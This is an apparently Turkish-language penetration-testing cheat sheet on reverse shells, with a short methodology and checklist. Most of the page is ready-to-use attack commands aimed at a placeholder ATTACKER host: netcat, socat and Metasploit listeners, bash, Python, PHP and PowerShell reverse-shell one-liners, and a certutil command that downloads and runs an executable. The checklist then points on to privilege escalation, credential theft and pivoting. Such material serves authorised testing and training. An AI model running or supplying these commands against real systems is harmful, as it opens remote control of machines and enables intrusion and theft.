Reverse Shells (Linux, Windows, MSFVenom)
generic difficulty: kolay
Reverse shell, hedefin senin dinleyicine bağlanmasını sağlar. Firewall outbound’a daha toleranslı olduğunda bind shell’den daha güvenilirdir. Amaç: stabil bir etkileşimli kabuk, sonra TTY ve gerekirse tünel.
Alt başlıklar
Section titled “Alt başlıklar”Metodoloji
Section titled “Metodoloji”-
Listener aç (nc / rlwrap / metasploit / socat).
-
Hedefte çalışan interpreter’a göre payload seç (bash, python, powershell…).
-
Bağlantıyı doğrula; kırılgan one-liner ise daha stabil ikinci stage yükle.
-
TTY yükselt (
python/script/socat) — interactive araçlar için şart.
Listener
Section titled “Listener”nc -lvnp 443rlwrap nc -lvnp 443socat file:`tty`,raw,echo=0 tcp-listen:443,reuseaddrmsfconsole -q -x "use multi/handlerset payload linux/x64/shell_reverse_tcpset LHOST ATTACKERset LPORT 443run"Hızlı Linux
Section titled “Hızlı Linux”bash -i >& /dev/tcp/ATTACKER/443 0>&1python3 -c 'import socket,subprocess,oss=socket.socket()s.connect(("ATTACKER",443))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)subprocess.call(["/bin/sh","-i"])'php -r '$s=fsockopen("ATTACKER",443)exec("/bin/sh -i <&3 >&3 2>&3")'Hızlı Windows
Section titled “Hızlı Windows”powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER',443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}"certutil -urlcache -split -f http://ATTACKER/rev.exe C:\Users\Public\rev.exe & C:\Users\Public\rev.exeChecklist
Section titled “Checklist”[ ] Listener ayakta (doğru IP/port)[ ] Outbound yol açık (443/80/53 tercih)[ ] Payload hedef mimari/OS ile uyumlu[ ] Stabil shell + TTY[ ] Sonraki adım: privesc / credential / pivot